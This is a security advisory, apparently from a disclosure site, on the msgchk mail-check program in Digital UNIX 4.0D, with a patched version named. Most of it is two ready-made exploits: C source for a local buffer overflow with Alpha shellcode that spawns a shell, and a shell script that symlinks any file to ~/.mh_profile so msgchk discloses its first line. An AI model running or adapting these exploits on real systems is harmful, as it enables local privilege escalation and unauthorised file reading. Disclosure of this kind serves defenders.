|
|
|
|
| |
| The msgchk program checks all known mail drops for mail that is waiting for you. A security vulnerability in the program allows local attackers to cause the program to execute arbitrary code and to view the first line of any file residing on the operating system's hard drive. |
| |
Credit:
The information has been provided by SeungHyun Seo and Boyce, Nick.
|
| |
Vulnerable systems:
Digital UNIX 4.0D Patch Kit 4 and prior
Immune systems:
Digital UNIX 4.0D Patch Kit 5
Exploit: (Buffer overflow)
/*
* 2001/09/05 - at the bench of windy fall
* /usr/bin/mh/msgchk buffer overflow exploit code by truefinder , seo@igrus.inha.ac.kr
* now we will drill /usr/bin/mh/msgchk
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define NOP 0x47ff041f
#define ALIGNSIZE (4 + 1 )
#define BUFSIZE (8000 + 211 )
#define RETADDR 0x000000011ffffaa0
#define DEFNOPSIZE 7168
char nop[] = { 0x1f, 0x04, 0xff, 0x47, 0x00 };
char retaddr[] = { 0xa0, 0xea, 0xff, 0x1f, 0x01 , 0x00 };
static char shellcode[] =
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
"\x12\x94\x07\x42" /* addq $16,60,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
"\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
"\xfc\xff\x30\xb2" /* stl $17,-4($16) */
"\xf9\xff\x1f\xd2" /* bsr $16,-28 */
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x31\x15\xd8\x43" /* subq $30,192,$17 */
"\x12\x04\xff\x47" /* clr $18 */
"\x40\xff\x1e\xb6" /* stq $16,-192($30) */
"\x48\xff\xfe\xb7" /* stq $31,-184($30) */
"\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
"\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
"\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
"\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
"\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
"\x38\xff\x7e\xb2" /* stl $19,-200($30) */
"\x13\x94\xe7\x43" /* addq $31,60,$19 */
"\x20\x35\x60\x42" /* subq $19,1,$0 */
"\xff\xff\xff\xff"; /* callsys ( disguised ) */
/* oh! this is ohhara's shellcode */
int main(int argc, char *argv[] )
{
char *buf , *buf_ptr;
int bufsize , alignsize , offset ;
int i, totalsize;
bufsize = BUFSIZE ; alignsize = ALIGNSIZE ; offset = 0 ;
if ( argc < 1 ) {
printf("usage : %s <bufsize> <align> <offset>\n", argv[0]);
exit (-1);
}
if (argc > 1 )
bufsize = atoi( argv[1] );
if ( argc > 2 )
alignsize = atoi( argv[2] ) + ALIGNSIZE ;
if ( argc > 3 )
offset = atoi ( argv[3] );
totalsize = alignsize + bufsize ;
buf = malloc( totalsize ) ;
memset ( buf, NULL , totalsize );
memset ( buf, 'A', alignsize );
buf_ptr = (char *)(buf + alignsize );
/* default nop size is 4096 bytes */
for ( i = 0 ; i < DEFNOPSIZE/4 ; i++ )
strcat ( buf_ptr , nop );
strcat ( buf_ptr, shellcode );
/* fill the block with 'A' */
for ( i =0 ; i < bufsize - DEFNOPSIZE - strlen(shellcode) - 8 ; i++ )
strcat( buf_ptr ,"A");
strcat ( buf_ptr , retaddr );
execl ("/var/tmp/mh/msgchk", "msgchk", buf, NULL );
}
Exploit: (First line viewing)
#!/bin/sh
# truefinder, seo@igrus.inha.ac.kr
# msgchk file read vulnerability
if [ ! -f $1 ]
then
echo "usage : $0 <file path>"
fi
cd ~
ln -sf $1 ~/.mh_profile
/usr/bin/mh/msgchk
EOF
|
|
|
|
|
